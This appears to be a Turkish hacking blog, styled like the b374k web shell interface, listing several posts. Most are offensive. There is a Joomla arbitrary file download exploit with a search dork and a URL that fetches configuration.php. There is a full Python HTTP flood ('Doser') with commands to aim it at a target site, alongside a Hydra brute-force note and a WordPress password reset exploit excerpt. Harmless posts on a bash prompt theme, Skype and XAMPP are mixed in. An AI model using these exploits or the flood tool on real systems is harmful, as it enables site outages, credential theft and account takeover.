b374k
v2.8
today : | at : | safemode : ON
/ var / www / public_html
name author perms com modified label

Joomla Exploit! com_joomanager - Arbitrary File Download b374k rwxr-xr-x 0 Mart 21, 2018

Filename Joomla Exploit! com_joomanager - Arbitrary File Download
Permission rw-r--r--
Author b374k
Date and Time Mart 21, 2018
Label
Action
,



1. Google inurl:"index.php?option=com_joomanager" = 3540 results

2. [URL]+/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php

Wordpress 4.9.4 Doser - DoS Tool b374k rwxr-xr-x 0 Şubat 11, 2018

Filename Wordpress 4.9.4 Doser - DoS Tool
Permission rw-r--r--
Author b374k
Date and Time Şubat 11, 2018
Label
Action
Merhaba arkadaşlar, wordpress 9.4 güncellemesinde gerçekleşen bir zafiyet sayesinde Doser toolu kullanarak CPU kullanımını %100 hale getirip sitenin database bağlantısını kesip siteyi kapatabiliyoruz. Bu sizin internetinizden ya da bir serverdan yapılan bir saldırı değildir.





Sırasıyla komutlar;


git clone https://github.com/Quitten/doser.py.git 
cd doser.py
python doser.py -t 999 -g 'http://target.com'

ve saldırı gerçekleşmeye başlıyor.

Python code;

import requests
import sys
import threading
import random
import re
import argparse
host=''
headers_useragents=[]
request_counter=0
printedMsgs = []
def printMsg(msg):
if msg not in printedMsgs:
print "\n"+msg + " after %i requests" % request_counter
printedMsgs.append(msg)
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\r%i requests has been sent" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter+=1
request = requests.get(url, headers=headers)
# print 'her'
handleStatusCodes(request.status_code)
except:
pass
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter+=1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except:
pass
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
def main(argv):
parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
parser.add_argument('-g', help='Specify GET request. Usage: -g \'\'')
parser.add_argument('-p', help='Specify POST request. Usage: -p \'\'')
parser.add_argument('-d', help='Specify data payload for POST request', default=None)
parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
args = parser.parse_args()
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.g:
url = args.g
for i in range(args.t):
t = SendGETThread()
t.start()
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
if len(sys.argv)==1:
parser.print_help()
exit()
if __name__ == "__main__":
main(sys.argv[1:])

Linux Terminalinizi ParrotSec Terminaline Benzetin b374k rwxr-xr-x 0 Ocak 31, 2018

Filename Linux Terminalinizi ParrotSec Terminaline Benzetin
Permission rw-r--r--
Author b374k
Date and Time Ocak 31, 2018
Label
Action
Merhaba arkadaşlar, kali linux, ubuntu, backbox vb. dağıtımlar kullanabilirsiniz. Ama ParrotSecOS'un terminali hoşunuza gidebilir.
Bunun için yapmanız gereken terminali açıp;

leafpad .bashrc
komutunu girmenizdir ve açılan dosyanın içeriğini silip yerine;

# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1="\[\033[0;31m\]\342\224\214\342\224\200\$([[ \$? != 0 ]] && echo \"[\[\033[0;31m\]\342\234\227\[\033[0;37m\]]\342\224\200\")[$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]root\[\033[01;33m\]@\[\033[01;96m\]\h'; else echo '\[\033[0;39m\]\u\[\033[01;33m\]@\[\033[01;96m\]\h'; fi)\[\033[0;31m\]]\342\224\200[\[\033[0;32m\]\w\[\033[0;31m\]]\n\[\033[0;31m\]\342\224\224\342\224\200\342\224\200\342\225\274 \[\033[0m\]\[\e[01;33m\]\\$\[\e[0m\]"
else
PS1='┌──[\u@\h]─[\w]\n└──╼ \$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\033[0;31m\]\342\224\214\342\224\200\$([[ \$? != 0 ]] && echo \"[\[\033[0;31m\]\342\234\227\[\033[0;37m\]]\342\224\200\")[$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]root\[\033[01;33m\]@\[\033[01;96m\]\h'; else echo '\[\033[0;39m\]\u\[\033[01;33m\]@\[\033[01;96m\]\h'; fi)\[\033[0;31m\]]\342\224\200[\[\033[0;32m\]\w\[\033[0;31m\]]\n\[\033[0;31m\]\342\224\224\342\224\200\342\224\200\342\225\274 \[\033[0m\]\[\e[01;33m\]\\$\[\e[0m\]"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
alias dir='dir --color=auto'
alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi 

yapıştırmanız olacaktır. Sonuç ise;

Skype (Preview) Insider'i Tanıttı (Linux) b374k rwxr-xr-x 0 Ekim 06, 2017

Filename Skype (Preview) Insider'i Tanıttı (Linux)
Permission rw-r--r--
Author b374k
Date and Time Ekim 06, 2017
Label
Action
Skype Insider'i tanıttı. Linux için de gelen bu yeni skype eskisinden daha iyi özelliklere ve görünüme sahip.

İndirme linki için ;
https://www.skype.com/tr/insider/

Görünüm;

Hydra Brute Force Attack b374k rwxr-xr-x 0 Eylül 13, 2017

Filename Hydra Brute Force Attack
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action


İnstall (Yükleme)
sudo apt-get install hydra
1 million word list;

Kali Linux Xampp Kurulumu b374k rwxr-xr-x 0 Eylül 13, 2017

Filename Kali Linux Xampp Kurulumu
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action

XAMPP İNDİR

chmod 755 xampp-linux-x64-7.1.4-0-installer.run
./xampp-linux-x64-7.1.4-0-installer.run
Çalıştırmak için "/opt/lampp/lampp start"

WordPress 4.7.4 Unauthorized Password Reset b374k rwxr-xr-x 0 Eylül 13, 2017

Filename WordPress 4.7.4 Unauthorized Password Reset
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action
Someone requested that the password be reset for the following account:
http://localhost/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
http://localhost/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin


As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set.
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of:
#!/bin/bash
cat > /tmp/outgoing-email

https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 

b374k © 2015 b374k | Cyber Security
b374k Template design by b374k